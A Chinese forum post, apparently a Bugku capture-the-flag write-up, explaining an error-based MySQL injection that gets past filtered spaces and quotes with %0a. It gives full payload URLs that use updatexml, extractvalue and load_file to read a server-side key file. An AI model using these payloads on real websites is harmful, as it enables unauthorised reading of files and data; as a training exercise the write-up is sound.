本帖最后由 daybreak 于 2017-8-14 13:44 编辑
1.如题说是报错注入 于是先判断是否 可以注入 双引号,单引号,空格等等都过滤了
检查方式 反引号
这里报错 如图
1
2.看到是mysql注入 在根据题目说明 于是直接上报错payload 这里有12中报错注入语句
详情可见我的帖子:http://www.bugku.com/forum.php?m ... ypeid%26typeid%3D26
这里随便用了一个方式
3.看到我们的语句成功执行。本来想爆库,爆表,爆字段一套走flag的 结果发现 他说文件路径, 我嗅到了不寻常的气息,不禁停下来开始思考。。。哟西 我们来sql注入读文件吧。
payload:http://103.238.227.13:10088/index.php?id=1%0aand%0a1=(updatexml(1,concat(0x3a,(select%0ahex(load_file(0x2f7661722f746573742f6b65795f312e706870)))),1))
这里本来以为就是flag了 结果没那么简单。。。。。
这里显示的字符只是前30个 哈哈哈 真尴尬 。 于是用substr 截取
但是updatexml 报错并不能加上 substr 也可能是我不了解 ,于是换个姿势
http://103.238.227.13:10088/index.php?id=1%0aand%0aextractvalue(1,concat(0x7e,(select%0aconcat(0x7e,substr((load_file(0x2F7661722F746573742F6B65795F312E706870)),86,149),0x7e)),0x7e)) 看到了 flag 但是不是全部 自己尝试着截取吧 懒没写脚本。
后面的我就不多说了 flag就这么简单
|